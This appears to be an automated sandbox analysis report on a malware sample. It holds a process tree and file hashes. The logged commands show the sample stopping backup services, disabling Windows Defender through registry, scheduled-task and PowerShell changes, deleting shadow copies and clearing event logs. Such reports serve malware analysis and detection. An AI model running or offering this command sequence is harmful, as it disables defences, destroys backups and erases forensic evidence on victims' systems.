net.exe net1.exe PID 2344 wrote to memory of 1204 2344 net.exe net1.exe PID 2344 wrote to memory of 1204 2344 net.exe net1.exe PID 860 wrote to memory of 4088 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 4088 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 4088 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 4088 wrote to memory of 1548 4088 net.exe net1.exe PID 4088 wrote to memory of 1548 4088 net.exe net1.exe PID 4088 wrote to memory of 1548 4088 net.exe net1.exe PID 860 wrote to memory of 1608 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 1608 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 860 wrote to memory of 1608 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1608 wrote to memory of 1800 1608 net.exe net1.exe PID 1608 wrote to memory of 1800 1608 net.exe net1.exe PID 1608 wrote to memory of 1800 1608 net.exe net1.exe PID 860 wrote to memory of 1716 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 1716 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 1716 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 1980 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 1980 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 1980 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 2148 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 2148 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 2148 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe PID 860 wrote to memory of 2580 860 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2904
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:784
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2264
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1360
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1348
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1848
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1204
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1548
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_1509d" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1509d" /y3⤵PID:1800
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1716
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1980
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2148
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2580
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3268
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:3968
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1668
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3432
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_1509d" start= disabled2⤵PID:3688
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3228
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3860
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2040
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3920
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1216
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3224
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2116
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2260
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2600
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:60
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3056
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:684
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:544
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2276
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1468
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1736
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1564
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2200
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2188
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2744
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2984
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:724
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2964
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3728
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3500 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1844 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1228 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3776
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1596
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2120
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1360
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1224 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:396
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2352 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3412 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2956
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1968 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2404 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1204
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
a76ffec12f485544a5f448dfa2e2ab3d
SHA1643a49b8123aa1eac8396a0fbccbfc4d0e989f32
SHA256a41bc189778bb2f6c16074c2083c642dc5b7ccc70c4a199e2d38df64c9352ac5
SHA51284135e22fe9dca340280db0ffa28858f2a622ed3f60e74f8197a654dbd4d99d4c285e101c3e4f93162947351ef3940dbfa3b37184d40faa2773acad5bd5e3b27